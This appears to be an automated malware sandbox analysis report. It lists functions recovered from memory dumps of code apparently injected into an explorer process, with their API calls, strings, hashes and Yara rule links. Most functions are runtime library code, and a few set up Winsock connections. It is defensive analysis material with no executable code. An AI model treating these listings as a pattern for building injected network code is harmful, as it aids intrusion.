API ID: _getptd$DestructExceptionObject$_amsg_exit_getptd_noexit
String ID: csm
API String ID: 331613561-1018135373
Opcode ID: 16076cd70ee89e0090311c6e33922bef2e7ed2237c2f23457eed0913bfab5565
Instruction ID: d1026cf952e7e969631c13fc4787541f82578b04366b6bca9f8ca45cd5547296
Opcode Fuzzy Hash: 16076cd70ee89e0090311c6e33922bef2e7ed2237c2f23457eed0913bfab5565
Instruction Fuzzy Hash: 3D212A762246848BD634DF56F04039EB761F788BA8F148226CF9947B58CB3CD88ACF01

Function 08B9A54B Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 63COMMON

Download Yara Rule

APIs

__DestructExceptionObject.LIBCMT ref: 08B9A576
__DestructExceptionObject.LIBCMT ref: 08B9A600
_getptd.LIBCMT ref: 08B9A553

Part of subcall function 08B93F34: _getptd_noexit.LIBCMT ref: 08B93F3A
Part of subcall function 08B93F34: _amsg_exit.LIBCMT ref: 08B93F4A

_getptd.LIBCMT ref: 08B9A605
_getptd.LIBCMT ref: 08B9A611

Strings

csm, xrefs: 08B9A5D3

Memory Dump Source

Source File: 00000002.00000002.3156274373.0000000008B90000.00000020.00000400.00020000.00000000.sdmp, Offset: 08B90000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8b90000_explorer.jbxd

Yara matches

Similarity

API ID: _getptd$DestructExceptionObject$_amsg_exit_getptd_noexit
String ID: csm
API String ID: 331613561-1018135373
Opcode ID: 9a2fc0b797f98f79fe4a14a5232f7452d79c1f12860342049905014b00c6b91d
Instruction ID: f00893e1a49a883e213e77fb23d33dded8b1450c901d4b55338f178ffb91a235
Opcode Fuzzy Hash: 9a2fc0b797f98f79fe4a14a5232f7452d79c1f12860342049905014b00c6b91d
Instruction Fuzzy Hash: FA21193A20469487DB30DF16E04036EB761F389BA6F459266DFDA07B54CF39E486CB10

Function 0F3C7444 Relevance: 10.6, APIs: 7, Instructions: 52stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32 ref: 0F3C7478
lstrlenA.KERNEL32 ref: 0F3C7485
lstrlenA.KERNEL32 ref: 0F3C7490
lstrlenA.KERNEL32 ref: 0F3C749B
_malloc_dbg.MSVCRT ref: 0F3C74A9
wsprintfA.USER32 ref: 0F3C74CB
lstrcatA.KERNEL32 ref: 0F3C74D7

Part of subcall function 0F3C7500: lstrlenA.KERNEL32 ref: 0F3C7509
Part of subcall function 0F3C7500: ??3@YAXPEAX@Z.MSVCRT ref: 0F3C7520
Part of subcall function 0F3C7500: ??3@YAXPEAX@Z.MSVCRT ref: 0F3C7529

Memory Dump Source

Source File: 00000002.00000002.3202220761.000000000F3C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0F3C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_f3c0000_explorer.jbxd

Yara matches

Similarity

API ID: lstrlen$??3@$_malloc_dbglstrcatwsprintf
String ID:
API String ID: 698131048-0
Opcode ID: dcc5b1d27802517691ad9a9eb10b06728176b8132d7a436ae91f0d32cd5aa00d
Instruction ID: fcba47abfa166f5805f588f6b9d03431526aa625de6547c3e0d50b08d6a3a22b
Opcode Fuzzy Hash: dcc5b1d27802517691ad9a9eb10b06728176b8132d7a436ae91f0d32cd5aa00d
Instruction Fuzzy Hash: B1113925700B4286FA249F62ED5473DE7A4EB89FE0F484039DE8A57B25DE3CD5898740

Function 0F3C6638 Relevance: 10.5, APIs: 7, Instructions: 37stringCOMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0F3C652C: GetWindowsDirectoryA.KERNEL32 ref: 0F3C6570
Part of subcall function 0F3C652C: GetVolumeInformationA.KERNEL32 ref: 0F3C65BF
Part of subcall function 0F3C652C: wsprintfA.USER32 ref: 0F3C661C

SHGetFolderPathA.SHELL32 ref: 0F3C6671
lstrcatA.KERNEL32 ref: 0F3C6681
lstrcatA.KERNEL32 ref: 0F3C668F
CreateDirectoryA.KERNEL32 ref: 0F3C669A
lstrcatA.KERNEL32 ref: 0F3C66AA
lstrcatA.KERNEL32 ref: 0F3C66B8
lstrcatA.KERNEL32 ref: 0F3C66C8

Memory Dump Source

Source File: 00000002.00000002.3202220761.000000000F3C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0F3C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_f3c0000_explorer.jbxd

Yara matches

Similarity

API ID: lstrcat$Directory$CreateFolderInformationPathVolumeWindowswsprintf
String ID:
API String ID: 943468954-0
Opcode ID: 75bf3eef1525e273a0ce453993aa70ff21a66b0465e8a14ac7d06560fd9804af
Instruction ID: 234d05bc723ec09b40ed439d67a7ce2a925154e8c988ade6b157c5ba8722174f
Opcode Fuzzy Hash: 75bf3eef1525e273a0ce453993aa70ff21a66b0465e8a14ac7d06560fd9804af
Instruction Fuzzy Hash: FE018C61A24B0282FB24EF26F81072D63A1FB89BA5F043130DD0B42B248F3CC28CDB00

Function 0C37045C Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 22COMMON

Download Yara Rule

APIs

_getptd.LIBCMT ref: 0C37047D
_getptd.LIBCMT ref: 0C37048B
_getptd.LIBCMT ref: 0C37049D

Strings

csm, xrefs: 0C370473
RCC, xrefs: 0C370463
MOC, xrefs: 0C37046B

Memory Dump Source

Source File: 00000002.00000002.3176672303.000000000C350000.00000020.00000001.00020000.00000000.sdmp, Offset: 0C350000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_c350000_explorer.jbxd

Yara matches

Similarity

API ID: _getptd
String ID: MOC$RCC$csm
API String ID: 3186804695-2671469338
Opcode ID: 98110a7f5896fdba0122f539c280d38c91be388ee6034f9a1e7113ee0ee41aa5
Instruction ID: aa02f4fa417788307d637414125d28aab7c93878cfbd4e721cf1ef83927a0211
Opcode Fuzzy Hash: 98110a7f5896fdba0122f539c280d38c91be388ee6034f9a1e7113ee0ee41aa5
Instruction Fuzzy Hash: CBE0123A634104CACB3D6B94A0043EC3660FB9CB15FA6D671C68443704C7BC44988F23

Function 08B9A648 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 22COMMON

Download Yara Rule

APIs

_getptd.LIBCMT ref: 08B9A669
_getptd.LIBCMT ref: 08B9A677
_getptd.LIBCMT ref: 08B9A689

Strings

MOC, xrefs: 08B9A657
csm, xrefs: 08B9A65F
RCC, xrefs: 08B9A64F

Memory Dump Source

Source File: 00000002.00000002.3156274373.0000000008B90000.00000020.00000400.00020000.00000000.sdmp, Offset: 08B90000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8b90000_explorer.jbxd

Yara matches

Similarity

API ID: _getptd
String ID: MOC$RCC$csm
API String ID: 3186804695-2671469338
Opcode ID: f432e7f19e78333f864de7c56edb8646315a7c2ff8ccbb67fb06ecd88be4fbfc
Instruction ID: c8e85175bf6dce1304bd755cea540a25272b70191f1a7bb0d79f02d3fb909368
Opcode Fuzzy Hash: f432e7f19e78333f864de7c56edb8646315a7c2ff8ccbb67fb06ecd88be4fbfc
Instruction Fuzzy Hash: 26E01A3A521294CACF652B6880543AD77A4F79DB0BF8AF9F9C7D447310CBBD49818E12

Function 08CBB248 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 22COMMON

Download Yara Rule

APIs

_getptd.LIBCMT ref: 08CBB269
_getptd.LIBCMT ref: 08CBB277
_getptd.LIBCMT ref: 08CBB289

Strings

csm, xrefs: 08CBB25F
MOC, xrefs: 08CBB257
RCC, xrefs: 08CBB24F

Memory Dump Source

Source File: 00000002.00000002.3156915026.0000000008CB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 08CB0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8cb0000_explorer.jbxd

Yara matches

Similarity

API ID: _getptd
String ID: MOC$RCC$csm
API String ID: 3186804695-2671469338
Opcode ID: f432e7f19e78333f864de7c56edb8646315a7c2ff8ccbb67fb06ecd88be4fbfc
Instruction ID: c4e909e9dedc89f1e3bdd9dc434db01ed449742c22e1633fb1c7ebad59dcee22
Opcode Fuzzy Hash: f432e7f19e78333f864de7c56edb8646315a7c2ff8ccbb67fb06ecd88be4fbfc
Instruction Fuzzy Hash: 78E0923A505E04C6C72D2B9584053ED3270FB98717FC6D569C70002311C7BC4A829A13

Function 0F3E105C Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 22COMMON

Download Yara Rule

APIs

_getptd.LIBCMT ref: 0F3E107D
_getptd.LIBCMT ref: 0F3E108B
_getptd.LIBCMT ref: 0F3E109D

Strings

csm, xrefs: 0F3E1073
MOC, xrefs: 0F3E106B
RCC, xrefs: 0F3E1063

Memory Dump Source

Source File: 00000002.00000002.3202220761.000000000F3C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0F3C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_f3c0000_explorer.jbxd

Yara matches

Similarity

API ID: _getptd
String ID: MOC$RCC$csm
API String ID: 3186804695-2671469338
Opcode ID: 98110a7f5896fdba0122f539c280d38c91be388ee6034f9a1e7113ee0ee41aa5
Instruction ID: bc7bd6d986442ed46e40b4a5397243279fdb3245e1dd6a51cb0fb0f75a06f2b9
Opcode Fuzzy Hash: 98110a7f5896fdba0122f539c280d38c91be388ee6034f9a1e7113ee0ee41aa5
Instruction Fuzzy Hash: DBE0E53B500294CAC7257B7494483AC36A5EFD8B36FCAD561865586782C7BC5888CB12

Function 0F3DAAA0 Relevance: 9.0, APIs: 6, Instructions: 47networkCOMMON

Download Yara Rule

APIs

WSAStartup.WS2_32 ref: 0F3DAAC7
socket.WS2_32 ref: 0F3DAADC
gethostbyname.WS2_32 ref: 0F3DAAEE
memcpy.MSVCRT ref: 0F3DAB05
htons.WS2_32 ref: 0F3DAB13
connect.WS2_32 ref: 0F3DAB2A

Memory Dump Source

Source File: 00000002.00000002.3202220761.000000000F3C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0F3C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_f3c0000_explorer.jbxd

Yara matches

Similarity

API ID: Startupconnectgethostbynamehtonsmemcpysocket
String ID:
API String ID: 3789965056-0
Opcode ID: 7b865840928cfa8ee3d735138662da95c86a41f3413a23ebb31b10c64b31859f
Instruction ID: 966000ded8ee1a60510d53cf7c3db9e4c885a45925352fa8486a5fdb8f5e5c38
Opcode Fuzzy Hash: 7b865840928cfa8ee3d735138662da95c86a41f3413a23ebb31b10c64b31859f
Instruction Fuzzy Hash: 5A11933260465581EB208F11E44475E73A1F748FA4F844231EE6903B69DF3CC64EC740

Function 0F3D89BC Relevance: 9.0, APIs: 6, Instructions: 44networkCOMMON

Download Yara Rule

APIs

WSAStartup.WS2_32 ref: 0F3D89D8
socket.WS2_32 ref: 0F3D89F4
gethostbyname.WS2_32 ref: 0F3D8A0A
memcpy.MSVCRT ref: 0F3D8A21
htons.WS2_32 ref: 0F3D8A33
connect.WS2_32 ref: 0F3D8A4A

Memory Dump Source

Source File: 00000002.00000002.3202220761.000000000F3C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0F3C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_f3c0000_explorer.jbxd

Yara matches

Similarity

API ID: Startupconnectgethostbynamehtonsmemcpysocket
String ID:
API String ID: 3789965056-0
Opcode ID: 1108d17e35cf59840690569f9378f038cd4dff50ad706ea5ac67de3fa5fbad05
Instruction ID: 6acd1986ef9dfff1709d03152ae894909e76370c0cbf6abde582fd257698daa6
Opcode Fuzzy Hash: 1108d17e35cf59840690569f9378f038cd4dff50ad706ea5ac67de3fa5fbad05
Instruction Fuzzy Hash: D4116072604A5292EB209F21E40476E7361FB48BA4F844631DE6A43BA4DF3CD68DD700

Function 0F3C7070 Relevance: 9.0, APIs: 6, Instructions: 40stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32 ref: 0F3C709F
lstrlenA.KERNEL32 ref: 0F3C70AA
_malloc_dbg.MSVCRT ref: 0F3C70B8
lstrcpy.KERNEL32 ref: 0F3C70CF
lstrcatA.KERNEL32 ref: 0F3C70DB
lstrcatA.KERNEL32 ref: 0F3C70E7

Memory Dump Source

Source File: 00000002.00000002.3202220761.000000000F3C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0F3C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_f3c0000_explorer.jbxd

Yara matches

Similarity

API ID: lstrcatlstrlen$_malloc_dbglstrcpy
String ID:
API String ID: 3808055810-0
Opcode ID: 8a518e6e79db813022c490c8f9d72f8f6e62adf8804b6a8215776fb4ef10fb86
Instruction ID: dcdbd342e458eb3a99d34d8a852e7cdfb7b7e92aace17761ae228b35bbe27fa7
Opcode Fuzzy Hash: 8a518e6e79db813022c490c8f9d72f8f6e62adf8804b6a8215776fb4ef10fb86
Instruction Fuzzy Hash: 8F018121B0074282EF289B67F95432DA761FF89FE4F0890389D0A07B29DE3CC1898700

Function 0F3DBD30 Relevance: 9.0, APIs: 6, Instructions: 30COMMONLIBRARYCODE

Download Yara Rule

APIs

EncodePointer.KERNEL32 ref: 0F3DBD4A
abort.LIBCMT ref: 0F3DBD67
DecodePointer.KERNEL32 ref: 0F3DBD7B
_NMSG_WRITE.LIBCMT ref: 0F3DBD8D
_set_abort_behavior.LIBCMT ref: 0F3DBD99
abort.LIBCMT ref: 0F3DBD9E

Memory Dump Source

Source File: 00000002.00000002.3202220761.000000000F3C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0F3C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_f3c0000_explorer.jbxd

Yara matches

Similarity

API ID: Pointerabort$DecodeEncode_set_abort_behavior
String ID:
API String ID: 2556904055-0
Opcode ID: dc58f8c0e7bbf0cce20ba8cb0b632d3b999d5a2622377be11c7867a0c8efaa55
Instruction ID: ca837552ac23bbb25486bebb8bd7eb994e158c6d5d77501213c49c17cfcc747b
Opcode Fuzzy Hash: dc58f8c0e7bbf0cce20ba8cb0b632d3b999d5a2622377be11c7867a0c8efaa55
Instruction Fuzzy Hash: F5F08229601B0A85EE286B70FC543292320FB84760F841C34DA0E47B66DF3C92559351

Function 0C35DB14 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 38COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 0C35DB26
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0C35DB6C

Part of subcall function 0C36AFAC: setlocale.LIBCMT ref: 0C36AFC0
Part of subcall function 0C36AFAC: _Yarn.LIBCPMT ref: 0C36AFDA
Part of subcall function 0C36AFAC: setlocale.LIBCMT ref: 0C36AFE9

std::bad_exception::bad_exception.LIBCMT ref: 0C35DB8B
_CxxThrowException.LIBCMT ref: 0C35DB9C

Strings

pression., xrefs: 0C35DB7F

Memory Dump Source

Source File: 00000002.00000002.3176672303.000000000C350000.00000020.00000001.00020000.00000000.sdmp, Offset: 0C350000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_c350000_explorer.jbxd

Yara matches

Similarity

API ID: setlocalestd::_$ExceptionLocinfo::_Locinfo_ctorLockitLockit::_ThrowYarnstd::bad_exception::bad_exception
String ID: pression.
API String ID: 409252694-815315158
Opcode ID: d8d1b0fd8525a88e1bc35c012dce00b6b0b8970b68ecff29792a992916a74fd3
Instruction ID: 57d9c4e81e7b915f62879d266dc6a26b824102001f1930f893a1808d0adab2a9
Opcode Fuzzy Hash: d8d1b0fd8525a88e1bc35c012dce00b6b0b8970b68ecff29792a992916a74fd3
Instruction Fuzzy Hash: 04F067A233054591DB14FF25EA906EC6321FB94788F8884215A0D4F96CEF24C98ECB42

Function 0F3CE714 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 38COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 0F3CE726
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0F3CE76C

Part of subcall function 0F3DBBAC: setlocale.LIBCMT ref: 0F3DBBC0
Part of subcall function 0F3DBBAC: _Yarn.LIBCPMT ref: 0F3DBBDA
Part of subcall function 0F3DBBAC: setlocale.LIBCMT ref: 0F3DBBE9

std::bad_exception::bad_exception.LIBCMT ref: 0F3CE78B
_CxxThrowException.LIBCMT ref: 0F3CE79C

Strings

bad locale name, xrefs: 0F3CE77F

Memory Dump Source

Source File: 00000002.00000002.3202220761.000000000F3C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0F3C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_f3c0000_explorer.jbxd

Yara matches

Similarity

API ID: setlocalestd::_$ExceptionLocinfo::_Locinfo_ctorLockitLockit::_ThrowYarnstd::bad_exception::bad_exception
String ID: bad locale name
API String ID: 409252694-1405518554
Opcode ID: 54f8d3a0f0436ce85f1ce92583ecf7ab21f190b34fe651aa93b6d57b470c6afc
Instruction ID: eceb01b80e684ce176376d44c4de2dcebaa64a2851fa7a624bca8eb2734ab385
Opcode Fuzzy Hash: 54f8d3a0f0436ce85f1ce92583ecf7ab21f190b34fe651aa93b6d57b470c6afc
Instruction Fuzzy Hash: 42F01D72210A4591CB14FF25ED502ACA321FB94BE4F8440359A4E4756AEF6CCE9AC7C0

Function 08CB9698 Relevance: 7.6, APIs: 5, Instructions: 93COMMON

Download Yara Rule

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 08CB96FA
_isleadbyte_l.LIBCMT ref: 08CB972A
MultiByteToWideChar.KERNEL32 ref: 08CB9769
MultiByteToWideChar.KERNEL32 ref: 08CB97B7
_errno.LIBCMT ref: 08CB97C1

Memory Dump Source

Source File: 00000002.00000002.3156915026.0000000008CB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 08CB0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8cb0000_explorer.jbxd

Yara matches

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::__errno_isleadbyte_l
String ID:
API String ID: 2998201375-0
Opcode ID: 984353ad4a58b6f003011b224ca72ddc36c0b4da5068afe336f99dafdafbc72c
Instruction ID: 4b89842f95f1c2e6830b29a50bc4a2e2059a1397676734cfe22d2b1c9a2a1630
Opcode Fuzzy Hash: 984353ad4a58b6f003011b224ca72ddc36c0b4da5068afe336f99dafdafbc72c
Instruction Fuzzy Hash: EC31D336214B8086D7208F15D5806A9BFB5FB85FD5F288129EB9967B68EB38C547CB00

Function 0F3EC94C Relevance: 7.6, APIs: 5, Instructions: 93COMMON

Download Yara Rule

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0F3EC9AE
_isleadbyte_l.LIBCMT ref: 0F3EC9DE
MultiByteToWideChar.KERNEL32 ref: 0F3ECA1D
MultiByteToWideChar.KERNEL32 ref: 0F3ECA6B
_errno.LIBCMT ref: 0F3ECA75

Memory Dump Source

Source File: 00000002.00000002.3202220761.000000000F3C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0F3C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_f3c0000_explorer.jbxd

Yara matches

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::__errno_isleadbyte_l
String ID:
API String ID: 2998201375-0
Opcode ID: 25ad539c16738e0748dbc861282459023939614fd04c275b88109c5013293657
Instruction ID: 6c1ae1a27f88813a777395a7e352310cf88bb256d659072e5771aaf992336dc7
Opcode Fuzzy Hash: 25ad539c16738e0748dbc861282459023939614fd04c275b88109c5013293657
Instruction Fuzzy Hash: AA31B332314790C6DB20CF25E58066DBBA5FF85FE4F585226EB8957B9ADB38D441C700

Function 0F3C1858 Relevance: 7.6, APIs: 5, Instructions: 69COMMONLIBRARYCODE

Download Yara Rule

APIs

isdigit.MSVCRT ref: 0F3C187E
isdigit.MSVCRT ref: 0F3C189A
isdigit.MSVCRT ref: 0F3C18AF
isdigit.MSVCRT ref: 0F3C18DF
isdigit.MSVCRT ref: 0F3C18EC

Memory Dump Source

Source File: 00000002.00000002.3202220761.000000000F3C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0F3C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_f3c0000_explorer.jbxd

Yara matches

Similarity

API ID: isdigit
String ID:
API String ID: 2326231117-0
Opcode ID: 85ef4d61709b9a753979fa94aa1d7a0c3e04f881cd7fff5174cf9ca040777e95
Instruction ID: 900189acb5acdb1eaef527e6c24c3b913f4be146cbfc2a03248f17cba2abea84
Opcode Fuzzy Hash: 85ef4d61709b9a753979fa94aa1d7a0c3e04f881cd7fff5174cf9ca040777e95
Instruction Fuzzy Hash: 0521B722A5CB5186FF38BB11E49437A33E5A701FB5F84052ECD424A963D75CDD88A7C1

Function 0F3C6F48 Relevance: 7.5, APIs: 5, Instructions: 37stringCOMMON

Download Yara Rule

APIs

StrStrIA.SHLWAPI ref: 0F3C6F5D
lstrlenA.KERNEL32 ref: 0F3C6F72
StrStrIA.SHLWAPI ref: 0F3C6F84
_malloc_dbg.MSVCRT ref: 0F3C6F97
memcpy.MSVCRT ref: 0F3C6FAC

Memory Dump Source

Source File: 00000002.00000002.3202220761.000000000F3C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0F3C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_f3c0000_explorer.jbxd

Yara matches

Similarity

API ID: _malloc_dbglstrlenmemcpy
String ID:
API String ID: 3719054251-0
Opcode ID: 059feee17097cd55d77ffe9413322c52f1ba9c365dcf953fa348bac87858a951
Instruction ID: d5f38193dfa2f7abff83a9772b8e67b7979d11925a28218995191bf2a1a4da12
Opcode Fuzzy Hash: 059feee17097cd55d77ffe9413322c52f1ba9c365dcf953fa348bac87858a951
Instruction Fuzzy Hash: D5F0C22171679282EA258B26F94433DA6A2EB4CFE0F484438DE4E47F29EF3CD5498740

Function 0C36BD1C Relevance: 7.5, APIs: 5, Instructions: 25COMMONLIBRARYCODE

Download Yara Rule

APIs

_getptd.LIBCMT ref: 0C36BD29

Part of subcall function 0C36F3DC: _getptd_noexit.LIBCMT ref: 0C36F3E2
Part of subcall function 0C36F3DC: _amsg_exit.LIBCMT ref: 0C36F3F2

_inconsistency.LIBCMT ref: 0C36BD37
_getptd.LIBCMT ref: 0C36BD3C
_inconsistency.LIBCMT ref: 0C36BD58
_getptd.LIBCMT ref: 0C36BD68

Memory Dump Source

Source File: 00000002.00000002.3176672303.000000000C350000.00000020.00000001.00020000.00000000.sdmp, Offset: 0C350000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_c350000_explorer.jbxd

Yara matches

Similarity

API ID: _getptd$_inconsistency$_amsg_exit_getptd_noexit
String ID:
API String ID: 823043651-0
Opcode ID: c1d21e303e0b783ba1171fbf254fe4ac55eab13696a181ff4cc61910d80a209c
Instruction ID: 9d78a7b3dd8cb71a4e5b2dcb04084170a5f232a04f239b3a60108037a7ca3575
Opcode Fuzzy Hash: c1d21e303e0b783ba1171fbf254fe4ac55eab13696a181ff4cc61910d80a209c
Instruction Fuzzy Hash: AEE03022331684C2CE656F95E0402ECA260FB8DB88F1CC1728A448FA0DDE74C4949F22

Function 08B994D4 Relevance: 7.5, APIs: 5, Instructions: 25COMMONLIBRARYCODE

Download Yara Rule

APIs

_getptd.LIBCMT ref: 08B994E1

Part of subcall function 08B93F34: _getptd_noexit.LIBCMT ref: 08B93F3A
Part of subcall function 08B93F34: _amsg_exit.LIBCMT ref: 08B93F4A

_inconsistency.LIBCMT ref: 08B994EF
_getptd.LIBCMT ref: 08B994F4
_inconsistency.LIBCMT ref: 08B99510
_getptd.LIBCMT ref: 08B99520

Memory Dump Source

Source File: 00000002.00000002.3156274373.0000000008B90000.00000020.00000400.00020000.00000000.sdmp, Offset: 08B90000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8b90000_explorer.jbxd

Yara matches

Similarity

API ID: _getptd$_inconsistency$_amsg_exit_getptd_noexit
String ID:
API String ID: 823043651-0
Opcode ID: 29253be273c857a74d034b5cd1df585e21219e4a2d683d97fdef8d216e342d08
Instruction ID: 870db33b70eae7582bcb70cad9e317c014a6a763bbd27bf81884724d5d121202
Opcode Fuzzy Hash: 29253be273c857a74d034b5cd1df585e21219e4a2d683d97fdef8d216e342d08
Instruction Fuzzy Hash: 2DE065762166C1C1CE61AB65E0801AEB7A0E74CBC2F1C90F9DBC907305DE20D491C750

Function 08CBA0D4 Relevance: 7.5, APIs: 5, Instructions: 25COMMONLIBRARYCODE

Download Yara Rule

APIs

_getptd.LIBCMT ref: 08CBA0E1

Part of subcall function 08CB4B34: _getptd_noexit.LIBCMT ref: 08CB4B3A
Part of subcall function 08CB4B34: _amsg_exit.LIBCMT ref: 08CB4B4A

_inconsistency.LIBCMT ref: 08CBA0EF

Part of subcall function 08CB5EFC: DecodePointer.KERNEL32 ref: 08CB5F07

_getptd.LIBCMT ref: 08CBA0F4
_inconsistency.LIBCMT ref: 08CBA110
_getptd.LIBCMT ref: 08CBA120

Memory Dump Source

Source File: 00000002.00000002.3156915026.0000000008CB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 08CB0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8cb0000_explorer.jbxd

Yara matches

Similarity

API ID: _getptd$_inconsistency$DecodePointer_amsg_exit_getptd_noexit
String ID:
API String ID: 3669027769-0
Opcode ID: 29253be273c857a74d034b5cd1df585e21219e4a2d683d97fdef8d216e342d08
Instruction ID: fd254e0963ef050e0c4f87613a10e1bdb9fce88bd5a7583f646112d7a870aff9
Opcode Fuzzy Hash: 29253be273c857a74d034b5cd1df585e21219e4a2d683d97fdef8d216e342d08
Instruction Fuzzy Hash: 20E0393620AEE0C0CE69AB66E1812ED7275EB48B82F0C8125CB890B706DE24C8919714

Function 0F3DC91C Relevance: 7.5, APIs: 5, Instructions: 25COMMONLIBRARYCODE

Download Yara Rule

APIs

_getptd.LIBCMT ref: 0F3DC929

Part of subcall function 0F3DFFDC: _getptd_noexit.LIBCMT ref: 0F3DFFE2
Part of subcall function 0F3DFFDC: _amsg_exit.LIBCMT ref: 0F3DFFF2

_inconsistency.LIBCMT ref: 0F3DC937

Part of subcall function 0F3E16B8: DecodePointer.KERNEL32 ref: 0F3E16C3

_getptd.LIBCMT ref: 0F3DC93C
_inconsistency.LIBCMT ref: 0F3DC958
_getptd.LIBCMT ref: 0F3DC968

Memory Dump Source

Source File: 00000002.00000002.3202220761.000000000F3C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0F3C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_f3c0000_explorer.jbxd

Yara matches

Similarity

API ID: _getptd$_inconsistency$DecodePointer_amsg_exit_getptd_noexit
String ID:
API String ID: 3669027769-0
Opcode ID: c1d21e303e0b783ba1171fbf254fe4ac55eab13696a181ff4cc61910d80a209c
Instruction ID: d14a908f5833e98290ef23bb64f4bb8784e42789c5d63c75e980ca33c104631b
Opcode Fuzzy Hash: c1d21e303e0b783ba1171fbf254fe4ac55eab13696a181ff4cc61910d80a209c
Instruction Fuzzy Hash: F1E03923225680C4CB117B75F1802AD7369EB89BF8F4CA231BA9A1B707DF38C491C755

Function 08B926B0 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 47COMMON

Download Yara Rule

APIs

_callnewh.LIBCMT ref: 08B926BE
malloc.LIBCMT ref: 08B926CA

Part of subcall function 08B923C4: _FF_MSGBANNER.LIBCMT ref: 08B923F4
Part of subcall function 08B923C4: _NMSG_WRITE.LIBCMT ref: 08B923FE
Part of subcall function 08B923C4: _callnewh.LIBCMT ref: 08B92432
Part of subcall function 08B923C4: _errno.LIBCMT ref: 08B9243D
Part of subcall function 08B923C4: _errno.LIBCMT ref: 08B92448

_CxxThrowException.LIBCMT ref: 08B92713

Strings

ort not loaded, xrefs: 08B926FB, 08B92726

Memory Dump Source

Source File: 00000002.00000002.3156274373.0000000008B90000.00000020.00000400.00020000.00000000.sdmp, Offset: 08B90000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8b90000_explorer.jbxd

Yara matches

Similarity

API ID: _callnewh_errno$ExceptionThrowmalloc
String ID: ort not loaded
API String ID: 431260796-2308354243
Opcode ID: 7665fe9ceecca017d0a85dbddab1a3ea81ff5fedb45c542187416bd9f05890ad
Instruction ID: 2ec159c14bab9a29db173a489d59ae44a3f688e596f510705965295db50d8dd4
Opcode Fuzzy Hash: 7665fe9ceecca017d0a85dbddab1a3ea81ff5fedb45c542187416bd9f05890ad
Instruction Fuzzy Hash: 6A01F529B05B4AA1DE14DB51F59036873A4F789385F485070CEED07B25EF3CC189CB00

Function 08CB32B0 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 47COMMON

Download Yara Rule

APIs

_callnewh.LIBCMT ref: 08CB32BE
malloc.LIBCMT ref: 08CB32CA

Part of subcall function 08CB2FC4: _FF_MSGBANNER.LIBCMT ref: 08CB2FF4
Part of subcall function 08CB2FC4: _NMSG_WRITE.LIBCMT ref: 08CB2FFE
Part of subcall function 08CB2FC4: HeapAlloc.KERNEL32 ref: 08CB3019
Part of subcall function 08CB2FC4: _callnewh.LIBCMT ref: 08CB3032
Part of subcall function 08CB2FC4: _errno.LIBCMT ref: 08CB303D
Part of subcall function 08CB2FC4: _errno.LIBCMT ref: 08CB3048

_CxxThrowException.LIBCMT ref: 08CB3313

Part of subcall function 08CB4704: RtlPcToFileHeader.NTDLL ref: 08CB4793
